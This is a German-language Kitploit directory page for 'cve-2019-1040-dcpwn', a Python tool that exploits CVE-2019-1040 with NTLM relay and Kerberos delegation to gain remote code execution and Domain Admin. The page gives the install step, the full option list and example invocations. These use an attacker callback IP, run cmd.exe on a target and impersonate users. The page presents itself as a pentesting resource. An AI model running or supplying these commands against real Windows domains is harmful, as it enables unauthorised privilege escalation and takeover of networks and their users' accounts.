Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-1040-dcpwn — CVE-2019-1040 mit Kerberos-Delegierung | Kitploit
Tools/GitHubGitHub/ridter/cve-2019-1040-dcpwn
Privilege EscalationSchwachstellenanalyseExploitationLaterale BewegungPenetrationstestsCommand and ControlAuthentifizierungRemote-Access-Tool
GitHubridter/cve-2019-1040-dcpwn

CVE-2019-1040-dcpwn

CVE-2019-1040 mit Kerberos-Delegierung

Repository anzeigen
336vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-1040-dcpwn

Tolle ausführliche Beschreibung! Ausnutzung von CVE-2019-1040 – Kombination von Relay-Schwachstellen für RCE und Domain Admin .

Daher habe ich dcpwn.py zur einfachen Nutzung geschrieben.

Anforderungen

Diese Tools benötigen impacket. Sie können es mit pip installieren:

root@kitploit:~
pip install impacket

Verwendung

root@kitploit:~
usage: dcpwn.py [-h] [-u USERNAME] [-p PASSWORD] [--hashes HASHES] -d DOMAIN
                [--smb-port [destination port]] --callback-ip CALLBACK_IP
                --ldaps LDAPS --dc-ip DC_IP [--timeout TIMEOUT]
                [--impersonate IMPERSONATE] -t Target [-share SHARE]
                [--command [COMMAND [COMMAND ...]]] [--debug]

CVE-2019-1040 mit Kerberos-Delegation

optionale Argumente:
  -h, --help            Zeigt diese Hilfemeldung an und beendet das Programm
  -u USERNAME, --user USERNAME
                        Benutzername für die Authentifizierung
  -p PASSWORD, --password PASSWORD
                        Passwort für die Authentifizierung, wird zur Eingabe aufgefordert, falls nicht angegeben und keine NT:NTLM-Hashes bereitgestellt werden
  --hashes HASHES       LM:NTLM-Hashes
  -d DOMAIN, --domain DOMAIN
                        Domäne, in der sich der Benutzer befindet (FQDN oder NETBIOS-Domänenname)
  --smb-port [destination port]
                        Zielport für die Verbindung zum SMB-Server
  --callback-ip CALLBACK_IP
                        Angreifer-Hostname oder IP
  --ldaps LDAPS         Hostname oder LDAPS-Server
  --dc-ip DC_IP         IP-Adresse des Domänencontrollers
  --timeout TIMEOUT     Zeitüberschreitung in Sekunden
  --impersonate IMPERSONATE
                        Ziel-Benutzername, der imitiert werden soll (über S4U2Self) für die Abfrage des ST. Beachten Sie, dass dies nur funktioniert, wenn die in diesem Skript angegebene Identität für die Delegierung an den angegebenen SPN erlaubt ist
  -t Target, --target Target
                        Hostname/IP des Zielservers
  -share SHARE          Freigabe, von der die Ausgabe abgerufen wird (Standard ADMIN$)
  --command [COMMAND [COMMAND ...]]
                        Befehl, der auf dem Ziel ausgeführt werden soll. Wenn leer, wird eine halb-interaktive Shell gestartet
  --debug               Aktiviert Debug-Ausgabe

Beispiel:

root@kitploit:~
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target

Wenn Sie einen Befehl wie cmd.exe ausführen möchten. verwenden Sie --command

Beispiel:

root@kitploit:~
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --command 'cmd.exe'

Wenn Sie einen bestimmten Benutzer imitieren möchten, verwenden Sie --impersonate

root@kitploit:~
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --impersonate someone
Tool herunterladen